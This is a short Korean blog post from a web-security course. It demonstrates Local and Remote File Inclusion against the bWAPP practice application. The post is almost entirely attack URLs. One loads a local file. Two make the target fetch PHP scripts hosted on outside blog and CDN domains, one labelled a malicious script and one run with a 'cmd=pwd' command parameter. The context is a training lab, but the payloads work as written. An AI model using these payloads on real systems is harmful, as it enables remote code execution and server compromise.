본문 바로가기
메가IT아카데미 국기과정/JAVA와 웹보안

[1-9] Remote & Local File Inclusion

by 한님폐하 2022. 9. 13.

1. Local File Inclusion

http://[타겟 IP]/bWAPP/rlfi.php?language=lang_en.php&action=go

 

 

2. Remote File Inclusion

  • 악성 스크립트
http://[타겟 IP]/bWAPP/rlfi.php?language=http://net123.tistory.com/attachment/cfile26.uf@9972323B5C72213133E1FE.php

 

  • 내부 서버 자원 접근
http://[타겟 IP]/bWAPP/rlfi.php?language=https://blog.kakaocdn.net/dn/q8s5y/btrGg1EzbAG/bDcfKh3MCkvzz8L1Q7XnkK/tfile.php&action=go&cmd=pwd